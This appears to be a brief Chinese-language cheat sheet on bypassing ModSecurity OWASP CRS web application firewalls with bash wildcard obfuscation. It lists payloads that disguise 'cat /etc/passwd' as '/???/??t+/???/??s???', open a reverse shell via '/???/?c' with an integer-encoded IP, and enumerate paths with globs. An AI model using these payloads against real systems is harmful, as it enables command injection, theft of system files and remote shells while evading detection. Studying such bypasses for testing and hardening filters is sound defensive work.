bash 语法可以使用问号 ?、正斜杠 /、数字和字母来执行系统命令
1、bash中的echo允许使用通配符* ? /等
2、比如ls可以使用/???/?s来进行来代替
3、waf拦截?cmd=cat /etc/passwd,可能会永远封锁ip可以进行替换?cmd=/???/??t+/???/??s???替换再进行url编码
4、反弹shell 可以使用/???/?c ip长整数 port进行替换
5、使用echo来枚举路径例如:/*/*ss*
MODSECURITY OWASP CRS 3.0
PL1~PL4 允许的ASCII码越来越少,能够使用的字符也越来越少。
PL0开启的规则较少,因此可以正常使用
通过增加和减少通配符可以进行waf绕过
